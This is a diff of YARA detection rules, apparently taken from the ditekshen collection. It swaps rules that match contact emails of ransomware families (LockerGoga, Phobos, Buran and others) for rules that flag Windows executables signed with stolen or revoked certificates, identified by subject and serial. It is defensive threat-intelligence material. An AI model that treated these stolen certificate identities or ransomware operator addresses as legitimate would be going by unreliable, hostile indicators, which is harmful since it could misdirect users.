-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Lockergoga
+
+rule DITEKSHEN_INDICATOR_KB_CERT_58Ec8821Aa2A3755E1075F73321756F4 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with LockerGoga ransomware"
-		author = "ditekShen"
-		id = "ff257dae-d09b-52b3-93ca-68a560231b0d"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "efa0e5c6-773a-5740-b7f9-ec10a92b1623"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L60-L80"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3893-L3904"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f3474f92d935dda0d4c3b11b6934aede69ed949c8ba4d196bfe320476d39ac36"
+		logic_hash = "b79f161c77cbae0bec55fb2b047983660c84d2bb93db8c91cb6c22fd4ad197cc"
 		score = 75
-		quality = 49
-		tags = ""
-
-	strings:
-		$s1 = "abbschevis@protonmail.com" nocase ascii wide
-		$s2 = "aperywsqaroci@o2.pl" nocase ascii wide
-		$s3 = "asuxidoruraep1999@o2.pl" nocase ascii wide
-		$s4 = "dharmaparrack@protonmail.com" nocase ascii wide
-		$s5 = "ijuqodisunovib98@o2.pl" nocase ascii wide
-		$s6 = "mayarchenot@protonmail.com" nocase ascii wide
-		$s7 = "mikllimiteds@gmail.com0" nocase ascii wide
-		$s8 = "phanthavongsaneveyah@protonmail.com" nocase ascii wide
-		$s9 = "qicifomuejijika@o2.pl" nocase ascii wide
-		$s10 = "rezawyreedipi1998@o2.pl" nocase ascii wide
-		$s11 = "sayanwalsworth96@protonmail.com" nocase ascii wide
-		$s12 = "suzumcpherson@protonmail.com" nocase ascii wide
-		$s13 = "wyattpettigrew8922555@mail.com" nocase ascii wide
+		quality = 75
+		tags = "FILE"
+		thumbprint = "19dd0d7f2edf32ea285577e00dd13c966844cfa4"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cbebbfeaddcbcccffdcdc" and pe.signatures [ i ] . serial == "58:ec:88:21:aa:2a:37:55:e1:07:5f:73:32:17:56:f4" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Goldenaxe
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0940Fa9A4080F35052B2077333769C2F : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with GoldenAxe ransomware"
-		author = "ditekShen"
-		id = "cd6486eb-742f-50fb-bd99-c5d778886477"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "2cc722de-97ff-53d1-9436-dc88c844186b"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L82-L91"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3906-L3917"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2540da85880dc08b51a2d096cefd8ed3cb14ccd171b71b434ccf26e7c5f1b54b"
+		logic_hash = "3ecf6982c779a5fd867fef4b753313e379151491fa8865e8ae20f0c9362431a2"
 		score = 75
-		quality = 71
-		tags = ""
-
-	strings:
-		$s1 = "xxback@keemail.me" nocase ascii wide
-		$s2 = "darkusmbackup@protonmail.com" nocase ascii wide
+		quality = 75
+		tags = "FILE"
+		thumbprint = "da154c058cd75ff478b248701799ea8c683dd7a5"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROFF LAIN, OOO" and pe.signatures [ i ] . serial == "09:40:fa:9a:40:80:f3:50:52:b2:07:73:33:76:9c:2f" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Getcrypt
+
+rule DITEKSHEN_INDICATOR_KB_CERT_56Fff139Df5Ae7E788E5D72196Dd563A : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with GetCrypt ransomware"
-		author = "ditekShen"
-		id = "b5e31968-e626-5fbb-8bfe-942b48737367"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "7cdca79f-5bf3-5768-b034-4d3bb177ffc9"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L93-L106"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3919-L3930"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "401f4e69235873adc271f8861912ec17daaa71a798c83df8cc3a9b88520708c9"
+		logic_hash = "022fd24ba023dba06f1c63d1d1c90d17dc82b060d634a27b237d37e37455964f"
 		score = 75
-		quality = 63
-		tags = ""
-
-	strings:
-		$s1 = "getcrypt@cock.li" nocase ascii wide
-		$s2 = "cryptget@tutanota.com" nocase ascii wide
-		$s3 = "cryptget@tutanota.com" nocase ascii wide
-		$s4 = "offtitan@pm.me" nocase ascii wide
-		$s5 = "offtitan@cock.li" nocase ascii wide
-		$s6 = "un42@protonmail.com" nocase ascii wide
+		quality = 75
+		tags = "FILE"
+		thumbprint = "0f69ccb73a6b98f548d00f0b740b6e42907efaad"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cifromatika LLC" and pe.signatures [ i ] . serial == "56:ff:f1:39:df:5a:e7:e7:88:e5:d7:21:96:dd:56:3a" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Cryptomix
+
+rule DITEKSHEN_INDICATOR_KB_CERT_03D433Fdc2469E9Fd878C80Bc0545147 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with CryptoMix ransomware"
-		author = "ditekShen"
-		id = "7e623d06-36e8-576d-b261-d562eccf549b"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "4f793397-2768-5b34-a9f5-9100dccfa80e"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L108-L123"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3932-L3943"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "27b75a476229fc877c316f7a61d1ed647f5a67ac44a174d86c084063f039b20c"
+		logic_hash = "fde125138ade8ab1a61544b90160f2c1d4bba3a09ffcf828768f98d925ab91c6"
 		score = 75
-		quality = 34
-		tags = ""
-
-	strings:
-		$s1 = "portstatrelea1982@protonmail.om" ascii wide nocase
-		$s2 = "unlock@eqaltech.su" ascii wide nocase
-		$s3 = "unlock@royalmail.su" ascii wide nocase
-		$s4 = "adexsin276@gmail.com" ascii wide nocase
-		$s5 = "nbactocepnyou@protonmail.com" ascii wide nocase
-		$s6 = "nunlock@eqaltech.su" ascii wide nocase
-		$s7 = "nsnlock@royalmail.su" ascii wide nocase
-		$s8 = "cersiacsofal@protonmail.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "64e90267e6359060a8669aebb94911e92bd0c5f3"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xEC\\xA3\\xBC\\xEC\\x8B\\x9D\\xED\\x9A\\x8C\\xEC\\x82\\xAC \\xEC\\x97\\x98\\xEB\\xA6\\xAC\\xEC\\x8B\\x9C\\xEC\\x98\\xA8\\xEB\\x9E\\xA9" and pe.signatures [ i ] . serial == "03:d4:33:fd:c2:46:9e:9f:d8:78:c8:0b:c0:54:51:47" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Buran
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Be3F393D1Ef0272Aed0E2319C1B5Dd0 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Buran ransomware"
-		author = "ditekShen"
-		id = "63cdda3f-78ed-5ce5-a8e0-e0893f2c314e"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "2be05341-c7a2-58fd-9211-8d3a912a7d5c"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L125-L140"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3945-L3956"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "685126efa7f90ce296fc616bd8d5d89a5b4b9aba8b60601b29534de21a0d0015"
+		logic_hash = "a7ff863b07d5ce011bdbcf86a3f562e8201926c138848544559bd1d16597ff95"
 		score = 75
-		quality = 59
-		tags = ""
-
-	strings:
-		$s1 = "recovery_server@protonmail.com" ascii wide nocase
-		$s2 = "recovery1server@cock.li" ascii wide nocase
-		$s3 = "polssh1@protonmail.com" ascii wide nocase
-		$s4 = "polssh@protonmail.com" ascii wide nocase
-		$s5 = "buransupport@exploit.im" ascii wide nocase
-		$s6 = "buransupport@xmpp.jp" ascii wide nocase
-		$s7 = "jacksteam2018@protonmail.com" ascii wide nocase
-		$s8 = "notesteam2018@tutanota.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "7745253a3f65311b84d8f64b74f249364d29e765"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Invincea, Inc." and pe.signatures [ i ] . serial == "0b:e3:f3:93:d1:ef:02:72:ae:d0:e2:31:9c:1b:5d:d0" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ransomwareexx
+
+rule DITEKSHEN_INDICATOR_KB_CERT_65628C146Ace93037Fc58659F14Bd35F : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with RansomwareEXX Linux ransomware"
-		author = "ditekShen"
-		id = "dfcff8cb-c50c-559e-b5b9-8c2cdac7a3dc"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "9104836a-3385-5b78-9e1d-705b7ed4b721"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L142-L150"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3958-L3969"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a83ada5d29c6d62a292c4b3a1379558cddcaf63d97dbdfc6afd27cc52f6f656d"
+		logic_hash = "a6b4cc307d6e6f4d5d275ef0765a7082216b1d277c9b1328abe7cb2c2497e411"
 		score = 75
-		quality = 73
-		tags = ""
-
-	strings:
-		$s1 = "france.eigs@protonmail.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "b59165451be46b8d72d09191d0961c755d0107c8"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ESET, spol. s r.o." and pe.signatures [ i ] . serial == "65:62:8c:14:6a:ce:93:03:7f:c5:86:59:f1:4b:d3:5f" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Phobos
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0084817E07288A5025B9435570E7Fec1D3 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Phobos ransomware"
-		author = "ditekShen"
-		id = "cee09220-4038-5190-b595-28f67c845588"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "31528b27-4a0c-5e97-b201-07e89248196a"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L152-L161"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3971-L3982"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cf9e163d2315d465afb47bf83f30d5d27e14c4cbbc1c235dcb15b75fb509ba7d"
+		logic_hash = "89da849911c6d6a3b6d45166bd9975828887b50ee149dea4cbae9cc5c0ecf6d2"
 		score = 75
-		quality = 71
-		tags = ""
-
-	strings:
-		$s1 = "helprecover@foxmail.com" ascii wide nocase
-		$s2 = "recoverhelp2020@thesecure.biz" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "f22e8c59b7769e4a9ade54aee8aaf8404a7feaa7"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE8\\xB4\\xBC\\xE8\\x89\\xBE\\xE5\\xBE\\xB7\\xE8\\xB4\\xBC\\xE6\\x8F\\x90\\xD0\\xAD\\xD0\\xAD\\xE6\\x8F\\x90\\xE8\\xB4\\xBC\\xE8\\xB4\\xBC\\xD0\\xAD\\xE5\\xBE\\xB7\\xE8\\xB4\\xBC\\xE8\\xB4\\xBC\\xE5\\xB0\\x94\\xE6\\x8F\\x90\\xE8\\x89\\xBE\\xE6\\x8F\\x90\\xE8\\xB4\\xBC\\xE5\\xB0\\x94\\xE6\\x8F\\x90\\xE8\\xB4\\xBC\\xE8\\x89\\xBE\\xD0\\xAD\\xE8\\x89\\xBE" and pe.signatures [ i ] . serial == "00:84:81:7e:07:28:8a:50:25:b9:43:55:70:e7:fe:c1:d3" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Epsilon
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4D26Bab89Fcf7Ff9Fa4Dc4847E563563 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Epsilon ransomware"
-		author = "ditekShen"
-		id = "acdeb3b1-872b-5892-9dfe-2e506f767da2"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "168281bf-35ad-542a-adb4-20d719e31e2d"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L163-L171"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3984-L3995"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "163694ed2ae181764fc6e62027487d183114be35a689dd44d4d9761149df244b"
+		logic_hash = "3eadf6eda2819101a370688d636250085915be3ebf1b3dec7a86d12a6a5ce681"
 		score = 75
-		quality = 73
-		tags = ""
-
-	strings:
-		$s1 = "neftet@tutanota.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "2be34a7a39df38f66d5550dcfa01850c8f165c81"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "qvarn pty ltd" and pe.signatures [ i ] . serial == "4d:26:ba:b8:9f:cf:7f:f9:fa:4d:c4:84:7e:56:35:63" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Thanos
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D9D419C9095A79B1F764297Addb935Da : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Thanos ransomware"
-		author = "ditekShen"
-		id = "22ffb4c9-f113-5d3e-a466-6c384c0c6e8a"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "7c45a78c-2cde-5200-81fd-239effef7fe6"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L173-L182"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3997-L4008"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "039ea384136a1aaa261702ed75ab9358aaa1ec2d5a8d35fe4789647f39490c7c"
+		logic_hash = "dd35b48752eec01e1bfff182410da9a857735e0052e9c1a0d7c366dbee808d3c"
 		score = 75
-		quality = 71
-		tags = ""
-
-	strings:
-		$s1 = "my-contact-email@protonmail.com" ascii wide nocase
-		$s2 = "get-my-data@protonmail.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "7d45ec21c0d6fd0eb84e4271655eb0e005949614"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Nova soft" and pe.signatures [ i ] . serial == "00:d9:d4:19:c9:09:5a:79:b1:f7:64:29:7a:dd:b9:35:da" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Vovalex
+
+rule DITEKSHEN_INDICATOR_KB_CERT_02E44D7D1D38Ae223B27A02Bacd79B53 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Vovalex ransomware"
-		author = "ditekShen"
-		id = "95e9ddce-8a19-59f1-baf4-bdac61c9c396"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "7f2ad143-c46b-58cb-9fe5-c7bb9c6d9234"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L184-L192"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4010-L4021"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0e8b426e55c1efaf59e5f255f1da9cdfbb509561d3f7ea5baa2815c3131866eb"
+		logic_hash = "7ab506b2e4a716bc6f7115a071f46df4ea4ac88a4b636506a13ac0d383664e58"
 		score = 75
-		quality = 73
-		tags = ""
-
-	strings:
-		$s1 = "vovanandlexus@cock.li" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "34e0ecae125302d5b1c4a7412dbf17bdc1b59f04"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhuhai Kingsoft Office Software Co., Ltd." and pe.signatures [ i ] . serial == "02:e4:4d:7d:1d:38:ae:22:3b:27:a0:2b:ac:d7:9b:53" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Alumnilocker
+
+rule DITEKSHEN_INDICATOR_KB_CERT_041868Dd49840Ff44F8E3D3070568350 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with AlumniLocker ransomware"
-		author = "ditekShen"
-		id = "64b6aff8-3758-5837-b814-e2505a9c12a3"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "2cfbae1f-9c8a-5263-b9d6-5be27fdca822"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L194-L202"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4023-L4034"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "aeab9cb2b2da246e1863cd1102d901d322017d0b309e852d83e4f66f6e4bdd22"
+		logic_hash = "80abb596d96cb388bf3ff23598fc889d4c14cccf262d01f10a5be3a738a4907e"
 		score = 75
-		quality = 73
-		tags = ""
-
-	strings:
-		$s1 = "alumnilocker@protonmail.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "e104f236e3ee7d21a0ea8053fe8fc5c412784079"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhuhai Kingsoft Office Software Co., Ltd." and pe.signatures [ i ] . serial == "04:18:68:dd:49:84:0f:f4:4f:8e:3d:30:70:56:83:50" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Doejocrypt
+
+rule DITEKSHEN_INDICATOR_KB_CERT_C501B7176B29A3Cb737361Cf85414874 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with DoejoCrypt ransomware"
-		author = "ditekShen"
-		id = "bdf67fd3-8614-52f0-8804-9905f067a848"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "8bebf02c-de14-5488-8720-5fc98b0799bd"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L204-L213"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4036-L4047"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b76996ef413d017fa571115f7331154c808fed0f1b1e0c97241cadbbef260a00"
+		logic_hash = "f3eb67b39e0e4e12388f17d231fadfc2ea36b1568191a411950c2e24c32ed09c"
 		score = 75
-		quality = 71
-		tags = ""
-
-	strings:
-		$s1 = "konedieyp@airmail.cc" ascii wide nocase
-		$s2 = "uenwonken@memail.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "0788801185a6bf70b805c2b97a7c6ce66cfbb38d"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8B\\x92\\xE8\\x89\\xBE\\xE8\\xAF\\xB6\\xE8\\x89\\xBE\\xE8\\xB4\\x9D\\xE8\\xAF\\xB6\\xE8\\xAF\\xB6\\xE8\\xB4\\x9D\\xE5\\x90\\xBE\\xE5\\xBC\\x97\\xE5\\xBC\\x97\\xE5\\x90\\xBE\\xE8\\xAF\\xB6\\xE5\\x8B\\x92\\xE8\\xB4\\x9D\\xE5\\xBC\\x97\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE8\\xAF\\xB6\\xE8\\x89\\xBE\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE8\\x89\\xBE\\xE5\\xBC\\x97\\xE5\\xBC\\x97" and pe.signatures [ i ] . serial == "c5:01:b7:17:6b:29:a3:cb:73:73:61:cf:85:41:48:74" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Purge
+
+rule DITEKSHEN_INDICATOR_KB_CERT_234Bf4Ef892Df307373638014B35Ab37 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Purge ransomware"
-		author = "ditekShen"
-		id = "2a0f2c69-b179-5e48-9db6-be25e329f72b"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "af403af3-2c10-5742-80f2-c507695106a2"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L215-L224"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4049-L4060"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "49f3f5a88212d4bed1f0237a4437fb537e84cd6dd26c5fe224250f3b6e39d384"
+		logic_hash = "d01dbb798b309927e666e5e68c56c6eeabad7ccbc427d62f0507597c6e9e7aa7"
 		score = 75
-		quality = 71
-		tags = ""
-
-	strings:
-		$s1 = "rscl@dr.com" ascii wide nocase
-		$s2 = "rscl@usa.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "348f7e395c77e29c1e17ef9d9bd24481657c7ae7"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "23:4b:f4:ef:89:2d:f3:07:37:36:38:01:4b:35:ab:37" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Zeoticus
+
+rule DITEKSHEN_INDICATOR_KB_CERT_C650Ae531100A91389A7F030228B3095 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Zeoticus ransomware"
-		author = "ditekShen"
-		id = "4d5f0d6d-f792-563d-9a9b-1986f5af8743"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "80ee9422-190d-5a4e-9a4c-fb8d1b2e2f8c"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L226-L235"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4062-L4073"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7a83b15b0c8e81f67d11f8b5d9a43ba4e1e3a0f6741ddd0daafe4e742dd91cd8"
+		logic_hash = "e5afd76711e1b466d7eba742f50c7f9551498796f0aca45566bd9686034efac3"
 		score = 75
-		quality = 71
-		tags = ""
-
-	strings:
-		$s1 = "anobtanium@tutanota.com" ascii wide nocase
-		$s2 = "anobtanium@cock.li" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "05eebfec568abc5fc4b2fd9e5eca087b02e49f53"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "POKEROWA STRUNA SP Z O O" and pe.signatures [ i ] . serial == "c6:50:ae:53:11:00:a9:13:89:a7:f0:30:22:8b:30:95" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Jobcryptor
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4F8Ebbb263F3Cbe558D37118C43F8D58 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with JobCryptor ransomware"
-		author = "ditekShen"
